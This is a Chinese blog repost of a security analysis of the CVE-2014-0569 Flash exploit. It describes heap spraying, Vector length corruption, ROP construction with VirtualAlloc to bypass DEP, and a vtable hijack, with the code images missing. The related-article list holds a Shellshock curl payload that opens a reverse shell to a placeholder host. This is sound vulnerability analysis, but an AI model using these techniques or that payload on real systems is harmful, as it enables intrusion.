cve-2014-0569 漏洞利用分析

最新推荐文章于 2024-04-28 09:56:28 发布
最新推荐文章于 2024-04-28 09:56:28 发布
阅读量113 收藏
点赞数
原文链接:https://juejin.im/post/5aa1163d6fb9a028df223463
版权

绿盟科技 · 2014/11/26 10:09

0×00 简述

来自CVE的漏洞描述:

测试环境: Win7 SP1 + Flash ActiveX 15.0.0.167

0×01 漏洞利用分析

介绍有关漏洞关键代码前,先看一下heap spray后的内存布局:

简单描述为:

漏洞致使Uint Vector的length字段被改写。

漏洞关键代码:

红线标注的部分其操作流程:

取预定大小0×1000的ByteArray对象_loc3,赋值给domainMemory,以便casi32函数操作此内存

预置大小0×1000的ByteArray对象:

通过函数atomicCompareAndSwapLength将_loc3长度置0

casi32函数内由于整数溢出造成执行流改变,致使向_loc3偏移0×1000处成功写入0×40000001

上述过程细节:

这样就可以以超长的Uint Vector为起点,读取预置的对象数据。

利用关键点:

搜索预置的sound对象进而计算出flash控件基址

预置的sound对象包含于喷射的少量Vector Object里,这里称之为vec_3。

具体的喷射代码:

通过特征比对遍历以获取vec_3中元素:

搜索到的其中一项:

计算flash控件基址:

在flash控件基址基础上获取rop链所需指令,用VirtualAlloc分配可执行内存过DEP。

构造rop链(部分):

修改sound对象虚表指针,并调用修改后的虚表函数将执行流导向stack pivot。

sound对象虚表指针修改前后:

修改后的虚表指针指向内容:

调用虚函数触发利用。

0×02 分析总结

完整的利用至少由两部分组成(html + swf),其中swf并不能独立执行,需要html传入的参数(shellcode),只拿到swf并不能获知攻击者的意图。

0×03 参考文章

  1. CVE-2014-0569漏洞分析

  2. Cracking the CVE-2014-0569 nutshell

weixin_34313182
关注
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1576
(一次大作业,比较啰嗦 见谅) 漏洞介绍 2017年11月14号,微软推送了常规的安全更新,其中就包括CVE-2017-11882的安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882的漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞的利用效果,堪称“无色无味”,即整个过程几.
CVE-2014-6287漏洞利用
yeshankuangrenaaaaa的博客
07-23 1525
目录CVE-2014-6287漏洞利用漏洞描述参考链接漏洞描述漏洞威胁版本漏洞复现靶机环境准备攻击浏览器方式脚本方式kali-msf工具复现结论 CVE-2014-6287漏洞利用 漏洞描述 参考链接 CVE-2014-6287 漏洞描述 发布时间:2014-09-15漏洞平台:windows 漏洞应用:HttpFileServer_v2.3_search命令执行漏洞 HTTPFileServer是一款专为个人用户所设计的HTTP文件服务器。Rejetto网站提供的HTTPFileServer 2.3b
深入探讨ROP 载荷分析
omnispace的博客
03-29 1685
0x00 简介 Exploit-db上看到的感觉还不错,所以就翻译一下,原文题目为《Deep Dive into ROP Payload Analysis》,作者Sudeep Singh。 这篇文章的主要目的是介绍漏洞利用中的ROP载荷的分析技术,同时也深入分析一种ROP缓解技术stack pivot检测技术,该技术目前被用于防护软件中。 通过分析之前发现的两个攻击样本(CVE-2010
漏洞原理CVE-2019-0808内核利用分析
anquanniu的博客
05-21 2738
漏洞概述 CVE-2019-0808是微软在2019年3月修补的内核漏洞,该漏洞只影响Windows 7和Windows Server 2008,漏洞允许攻击者提升权限并在内核模式下执行任意代码。在谷歌威胁分析团队的报告中发现该漏洞用于进行Chrome沙箱逃逸,和CVE-2019-5786 Chrome 远程代码执行漏洞配合使用。 补丁分析 通过对Win7上3月份的补丁进行对比可以知道问题出现在x...
php cve-2014-9427漏洞,GNU Bash环境变量远程任意代码执行漏洞CVE-2014-6271
weixin_29255731的博客
04-02 829
ps:利用payloadcurl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"发布日期:2014-09-25CVE ID:CVE-2014-6271受影响的软件及系统:==================...
Weblogic SSRF 漏洞(CVE-2014-4210)分析
m0_61506558的博客
11-21 981
SSRF 漏洞犹如一位隐形杀手,常年隐匿于大型站点中不起眼的角落,有非常大的威胁。国内的互联网科技公司如腾讯、阿里巴巴、华为、百度等,均出现过 SSRF漏洞,且具有一定的危害。的防御策略是否存在漏洞,攻击者是否可以绕过其防御策略,或者能否配合特殊环境下的配置,形成漏洞利用链。因此对于安全审计人员来说,更应注意 SSRF 漏洞的挖掘,除了基本的搜索。的方式去挖掘、测试,能挖掘出漏洞且不影响正常业务的方式都是好方式。不存在或者端口不存在,则返回以下信息,如图。SSRF 漏洞案例,该漏洞存在于。
CVE-2014-0160-心脏滴血漏洞
Amdy_amdy的博客
12-16 3312
心脏滴血漏洞-CVE-2014-0160 漏洞介绍 2014年4月7日,OpenSSL发布安全公告,在OpenSSL1.0.1版本至OpenSSL1.0.1f Beta1版本中存在漏洞,该漏洞中文名称为心脏滴血,英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上,Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞,OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。 利用该漏洞
CVE-2022-1471 SnakeYaml漏洞分析
xillianpeng的专栏
04-28 1532
原理:利用SPI机制,查找ClassPath路径下的META-INF/services中的文件,自动加载文件中定义的类。升级snakeyaml到2.0及以上版本,sprinboot升级后可能遇到的问题,参考。攻击方式:ScriptEngineManager链。
[漏洞分析] CVE-2022-0492 容器逃逸漏洞分析
热门推荐
Breeze的博客
03-11 1万+
CVE-2022-0492 容器逃逸分析 文章目录CVE-2022-0492 容器逃逸分析漏洞简介环境搭建漏洞原理与相关知识漏洞发生点cgroup 简介cgroup 使用release_agentunshare 命令漏洞利用利用条件漏洞利用获得CAP_SYS_ADMINmount cgroup与获取容器在宿主机中的路径修改release_agent 触发逃逸exp缓解措施参考 漏洞简介 漏洞编号: CVE-2022-0492 漏洞产品: linux kernel - cgroup 影响版本: ~linux
破壳漏洞(CVE-2014-6271)综合分析1
08-04
【破壳漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 破壳漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发现的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
"Joomla漏洞利用.exe" 文件可能是用于测试系统是否存在CVE-2015-7857漏洞的工具。这类工具通常由安全研究人员或渗透测试人员使用,以评估网站的安全性。然而,恶意用户也可能滥用这类工具进行非法攻击。因此,对于...
ElasticSearch 远程代码执行漏洞分析CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
php cve-2014-8142漏洞,Drupal 7.31 SQL注入漏洞(CVE-2014-3704) EXP测试代码
weixin_39594312的博客
04-01 713
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。最近频繁爆发各种0day,真是把大家累坏了。Drupal 7.31 SQL注入漏洞(CVE-2014-3704)就是其中一个,该漏洞利用测试方法“简单粗暴”,受到安全研究者们的青睐。Drupal Sql注入漏洞原理是酱紫的,Drupal在处理IN语句的时候,要通过expandArgu...
测表自动组装机_三维3D设计图纸.zip
09-29
测表自动组装机_三维3D设计图纸.zip
美萍民宿客栈收银管理系统标准版2021v1
09-29
美萍民宿客栈收银管理系统标准版2021v1官方正式版,要有加密狗才可以安装使用。
基于ThinkPHP6的ChatGPT接口接入与调用设计源码
最新发布
09-29
该项目是一款基于ThinkPHP6框架开发的ChatGPT接口接入与调用设计源码,包含51个文件,其中包括33个PHP源代码文件、4个HTML文件、4个Git忽略文件、2个文本文件、2个Markdown文件、1个htaccess文件、1个JSON文件、1个锁定文件和1个ICO文件。该系统实现了对ChatGPT接口的调用与集成,适用于需要集成智能聊天功能的Web应用开发。
基于C#的教师授课系统设计与实现.docx
09-29
基于C#的教师授课系统设计与实现.docx
基于asp.net的房产公司综合信息管理系统设计与实现.docx
09-29
基于asp.net的房产公司综合信息管理系统设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值